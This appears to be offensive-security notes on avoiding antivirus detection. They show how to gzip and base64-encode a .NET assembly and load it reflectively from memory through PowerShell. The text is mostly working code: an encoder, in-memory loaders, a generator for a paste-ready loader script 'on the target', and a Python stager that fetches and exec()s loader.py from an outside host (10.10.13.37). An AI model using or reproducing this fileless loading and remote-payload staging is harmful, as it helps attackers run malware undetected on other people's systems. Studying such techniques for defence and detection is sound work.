A way to bypass AV signature analysis: gzip-compress and base64-encode a .NET assembly, then decode it and load it reflectively from memory with PowerShell, so the original binary never touches disk. If you intend to call the entry point directly by name ([Namespace.Program]::Main(...)), make the Program class and its Main method public when compiling; the reflection-based loader below passes the NonPublic binding flag and works either way. Caveat: this only avoids on-disk file scanning. The PowerShell loader itself is subject to AMSI and script block logging, and on .NET Framework 4.8 and later Assembly.Load(byte[]) hands the buffer to AMSI as well, so a signatured assembly can still be caught in memory.
CompressEncodeAssembly.ps1
```powershell
# Read the compiled assembly, gzip it, base64-encode the result and write it to b64.txt
$bytes = [System.IO.File]::ReadAllBytes("$(pwd)\binary.exe")
[System.IO.MemoryStream] $outStream = New-Object System.IO.MemoryStream
$gzipStream = New-Object System.IO.Compression.GzipStream($outStream, [System.IO.Compression.CompressionMode]::Compress)
$gzipStream.Write($bytes, 0, $bytes.Length)
$gzipStream.Close()   # must be closed before ToArray() so the gzip footer is flushed
$outStream.Close()
[byte[]] $outBytes = $outStream.ToArray()
$b64Zipped = [System.Convert]::ToBase64String($outBytes)
$b64Zipped | Out-File -NoNewLine -Encoding ASCII .\b64.txt   # one line, no trailing newline
notepad.exe .\b64.txt
```
An example of how the binary can be decoded, decompressed and run from memory. The "..." placeholder is the base64 string written to b64.txt above; arguments passed to the function are forwarded to Main(string[] args), and whatever Main writes to Console.Out is captured and returned as a string:
```powershell
function Invoke-S0m3B1n4ry
{
    #[CmdletBinding()]
    #Param([String]$Command = " ")

    # base64 -> gzip -> raw PE image, entirely in memory
    $a = New-Object System.IO.MemoryStream(, [System.Convert]::FromBase64String("..."))
    $b = New-Object System.IO.Compression.GZipStream($a, [System.IO.Compression.CompressionMode]::Decompress)
    $c = New-Object System.IO.MemoryStream
    $b.CopyTo($c)
    [byte[]]$d = $c.ToArray()

    # Load the assembly from the byte array; nothing is written to disk
    $e = [System.Reflection.Assembly]::Load($d)

    # Redirect Console.Out so that anything Main prints is captured
    $f = [System.Console]::Out
    $g = New-Object System.IO.StringWriter
    [System.Console]::SetOut($g)

    # NonPublic is included so Main is found even when Program/Main are not public;
    # Assembly.GetType(name) resolves non-public types too, so it needs no flags
    $h = [Reflection.BindingFlags]"Public,NonPublic,Static"
    $i = $e.GetType("S0m3B1n4ry.Program")
    $j = $i.GetMethod("Main", $h)

    # The unary comma wraps the string[] so it is passed as a single Main(string[] args) parameter
    $j.Invoke($null, (, [string[]]$args))
    #$i = [S0m3B1n4ry.Program]::Main($Command.Split())

    # Restore the original stdout and return the captured output
    [System.Console]::SetOut($f)
    $k = $g.ToString()
    $k
}
```
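An added example (my own code, not from the original notes) that packages the two steps above into reusable functions: ConvertTo-GzipBase64 builds the blob, Invoke-ReflectiveAssembly loads it from memory and runs the entry point, and New-ReflectiveLoaderScript emits a stand-alone loader script with the blob baked in. Unlike the hardcoded S0m3B1n4ry.Program lookup, it uses Assembly.EntryPoint, so it works whether or not Program/Main are public, and it inspects Main's signature so both Main() and Main(string[] args) run correctly. The three function names and the .\binary.exe path are placeholders I chose.

```powershell
# Added example, not code from the original notes. Function names and paths are placeholders.

function ConvertTo-GzipBase64 {
    param([Parameter(Mandatory)][byte[]]$Bytes)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GzipStream($out, [System.IO.Compression.CompressionMode]::Compress)
    $gz.Write($Bytes, 0, $Bytes.Length)
    $gz.Close()                      # writes the gzip footer; must happen before ToArray()
    $out.Close()
    [Convert]::ToBase64String($out.ToArray())
}

function Invoke-ReflectiveAssembly {
    param(
        [Parameter(Mandatory)][string]$Base64Gzip,
        [string[]]$Arguments = @()
    )
    # base64 -> gzip -> raw PE image, all in memory
    $inStream = New-Object System.IO.MemoryStream(, [Convert]::FromBase64String($Base64Gzip))
    $gz  = New-Object System.IO.Compression.GzipStream($inStream, [System.IO.Compression.CompressionMode]::Decompress)
    $raw = New-Object System.IO.MemoryStream
    $gz.CopyTo($raw)
    [byte[]]$pe = $raw.ToArray()

    # Cheap sanity check before handing the buffer to the CLR: a PE image starts with "MZ"
    if ($pe.Length -lt 2 -or $pe[0] -ne 0x4D -or $pe[1] -ne 0x5A) {
        throw "Decoded blob is not a PE image (missing MZ header)"
    }

    # Load from the byte array: nothing touches disk. On .NET Framework 4.8+ this
    # overload is itself passed to AMSI, so in-memory detection remains possible.
    $asm = [System.Reflection.Assembly]::Load($pe)

    # Use the assembly's own entry point instead of hardcoding Namespace.Program;
    # this also finds a non-public Main
    $main = $asm.EntryPoint
    if (-not $main) { throw "Assembly has no entry point (is it a DLL rather than an EXE?)" }

    # Match Main's real signature: Main() takes no parameters, Main(string[] args) takes one.
    # The unary comma wraps the string[] so it is passed as ONE parameter, not one per element.
    if ($main.GetParameters().Length -eq 0) { $invokeArgs = $null }
    else { $invokeArgs = @(, [string[]]$Arguments) }

    # Capture Console.Out and Console.Error, and restore them even if Main throws
    $oldOut = [Console]::Out
    $oldErr = [Console]::Error
    $sw = New-Object System.IO.StringWriter
    [Console]::SetOut($sw)
    [Console]::SetError($sw)
    try {
        $null = $main.Invoke($null, $invokeArgs)
    } finally {
        [Console]::SetOut($oldOut)
        [Console]::SetError($oldErr)
    }
    $sw.ToString()
}

function New-ReflectiveLoaderScript {
    # Emits a self-contained loader script: the decoder function plus a wrapper
    # with the blob embedded, ready to paste into a PowerShell session on the target.
    param(
        [Parameter(Mandatory)][string]$Path,
        [string]$FunctionName = 'Invoke-S0m3B1n4ry'
    )
    $blob = ConvertTo-GzipBase64 -Bytes ([IO.File]::ReadAllBytes((Resolve-Path $Path)))
    $decoder = ${function:Invoke-ReflectiveAssembly}.ToString()   # body of the function above
    @"
function Invoke-ReflectiveAssembly {
$decoder
}
function $FunctionName {
    Invoke-ReflectiveAssembly -Base64Gzip '$blob' -Arguments ([string[]]`$args)
}
"@
}

# Usage:
#   New-ReflectiveLoaderScript -Path .\binary.exe | Out-File -Encoding ASCII .\loader.ps1
#   . .\loader.ps1; Invoke-S0m3B1n4ry arg1 arg2
# or, without generating a script, straight from the b64.txt produced above:
#   Invoke-ReflectiveAssembly -Base64Gzip (Get-Content .\b64.txt -Raw) -Arguments 'arg1','arg2'
```

Console.Error is redirected together with Console.Out because an assembly that reports failures on stderr would otherwise print into the operator's console instead of the returned string; the try/finally guarantees the original writers come back even when Main throws (the exception surfaces wrapped in a TargetInvocationException).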
The same trick from Python running on the CLR (the clr module below): a short stager pulls loader.py over HTTP and exec()s it without writing it to disk:
```python
>>> import urllib.request
>>> request = urllib.request.Request('http://10.10.13.37/loader.py')
>>> result = urllib.request.urlopen(request)
>>> payload = result.read()
>>> exec(payload)
```
The downloaded loader uses the clr module to load the compressed, base64-encoded assembly into the CLR and invoke Loader.Program.Main:
```python
import clr
import zlib
import base64

clr.AddReference('System')
from System import *
from System.Reflection import *

# <LOADER_BYTES_B64> is the assembly, zlib-compressed (zlib.compress) and then base64-encoded.
# zlib.decompress() expects the zlib format: for a gzip blob, as produced by the
# PowerShell snippet above, use zlib.decompress(data, 16 + zlib.MAX_WBITS) instead.
# Re-encoding to base64 and decoding it on the .NET side yields a CLR byte[]
# that Assembly.Load() accepts.
b64 = base64.b64encode(zlib.decompress(base64.b64decode(b'<LOADER_BYTES_B64>'))).decode()
raw = Convert.FromBase64String(b64)
assembly = Assembly.Load(raw)
program_type = assembly.GetType('Loader.Program')

# GetMethod('Main') without binding flags only finds a public Main. Main is static,
# so the instance created here is not needed (None would do); the second argument
# None means a parameterless Main().
program_type.GetMethod('Main').Invoke(Activator.CreateInstance(program_type), None)
```